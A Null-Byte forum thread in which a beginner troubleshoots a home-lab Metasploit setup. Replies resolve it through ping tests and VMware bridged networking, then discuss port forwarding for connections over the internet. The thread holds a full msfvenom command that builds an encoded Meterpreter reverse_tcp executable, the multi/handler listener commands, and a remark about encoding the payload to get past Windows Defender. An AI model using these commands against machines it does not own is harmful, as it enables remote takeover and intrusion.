Good afternoon Null-Byte,
I'm fairly new at this and have basic Linux skills but I learn fast and feel that I have done my due diligence to try to fix this on my own.. but I've hit a brick wall and I need your help, if you deem me worthy of it.
Now, to the problem at hand.
I have physical access to a 2nd computer that I'm trying to install a listener on but no matter what method I use or how vulnerable I make it, I can never get Meterpreter to open a session.
I disabled all protection on the target computer for simplicity's sake and followed master OTW's tutorial and used "adobe pdf embedded exe" but after checking the exploit database I realized it might not workl on Windows 8.1.
Then I tried a "java signed applet" tutorial I found but that didn't work either, maybe because it targets x86 while my target has x64. No biggie, next vulnerability.
Off to try "java rhino"! Seems to target all the right things. I installed all the vulnerable programs, sent it.. nothing.
At this point I was thinking I'm messing up some early steps, came back here and double, triple, quadruple-checked everything but it was all in order.
Then I completely removed all antivirus and firewalls from the target and used . Still nothing.
My latest attempt was creating a straight up .exe through msfvenom and see if that would work but still no session.
My limited troubleshooting skills included:
Making sure the host was listening.
Tried and re-tried all previous exploits on several different ports, 20, 80, 443 and the default 4444.
Re-install Kali.
Tried encoding it.
Pinged the hell out of both target and host.
And just for the hell of it, I installed Kali on the target computer and tried creating the listener from there to see if there was something wrong with my computer.
I feel like I'm missing something very simple that is right in front of my eyes and I'd greatly appreciate any and all help on the matter.
Ulf
13 Responses
You are probably missing something. Usually, the straight .exe should work out of the box. You haven't mentioned if you are in LAN or WAN. Also, please share with us the exact options you are using to run the exploit.
You may want to check the port forwarding on your home router if you haven't already. The connection might not be routing back to you correctly?
Dont use any encoder... no iterations too... no exploit... just a plain simple exe... try that...;);)
@CIUFFY: In a LAN. When I did the .exe exploit I used this command line "msfvenom -p windows/meterpreter/reverse tcp LHOST=192.168.164.220 LPORT=20/80/443/4444 -f exe -e x86/shikata ga nai -i 10 > exploit.exe" Also tried it without the encoder since there's AV anymore.
According to the video tutorial I looked at I also did in another tab
"use exploit/multi/handler
set payload windows/meterpreter/reverse tcp
set lhost 192.168.164.220
set lport 20/80/443/4444
exploit"
Removed the underscores and noted all the ports I've used for the exploits.
@LEO: Been trying to and I almost feel if that's the source of my issues, the building I live in has a fiber optic internet and there's no standard router to speak off. No luck trying to access the Default Gateway IP either. Maybe a call to my ISP is in order.
If you are in LAN you don't need port forwarding. Any port should work.
Very simple: can you even ping the victim machine?
Forgive me if this is an extremely noobish question, LAN vs WAN? From what I know I'm on a LAN, both computers on the same network inside my apartment and all that. No complicated stuff.
Yup, I can ping the victim.. but.. I just reversed it and the target can't ping me back, neither my windows or Kali through VMware. Kinda makes sense now why I never receive a session. Like I said, it was something simple. Gonna see if I can sort that out and then come back, thanks CIUFFY.
Glad I could help. LAN is locale area network, usually controller by a router and refers to itself with 129.168.1.x, while WAN is wide area, basically, the internet, in short two computers on differenti LANs.
Solved! Thanks Ciuffy, Leo and Se7enpeace for your comments and help!
After I noticed I couldn't ping back to the host I messed around some with my internet settings and Firewall. Made some adjustments which allowed me to ping my Windows but not Kali. Then I changed the network settings in VMware from NAT to Bridged which, for some reason, made it so I couldn't ping windows but Kali got a new IP and was pingable. Made a new exploit and.. Voilà! "Meterpreter Session 1 opened.. "!
Couldn't have done it without you guys, was way too simple for me to notice on my own.
Thanks again,
Ulf
Glad to see you solved the problem. Good luck with your exploit training :)
sob... its se7enpeace...
Haha jk;);)..
Glad you got it working ;P
Glad you were able to solve it. BTW idk what browser you used for the java applet, but if it was chrome that may have been your problem. Not to hijack a thread but I have a question about the WAN. If you don't use an encoder, don't be surprised if windows defender prevents execution of your exe
When you open a port on your computer, say 192.168.1.111 (on the LAN), does that open the port on your public IP?
For port forwarding, it asks for a starting port and destination port. So if the starting port was 7777 and the destination port was 8000, would I set the lport to the 7777 and my router would forward it to my machine? Then would I have the listener on 8000?
Never really experimented with WAN stuff.
Basically: ports exist to identify computers in a LAN from the WAN.
If your listener is running on your computer, when the exploit gets executed it connects back to your public IP (router), but how to redirect the connection to your computer? You forward port 7777 to you computers LAN ip , so that by specifying port 7777 in the payload, the connection goes trough the router and then to the computer which is hosting the listener.
Thank you. That's what I thought. I just don't understand what the point of a destination port is. If the port forwarding tab on my router requests the IP to which the port will be forwarded, why do I need to specify a destination port? Did my above-mentioned setup not work?
Share Your Thoughts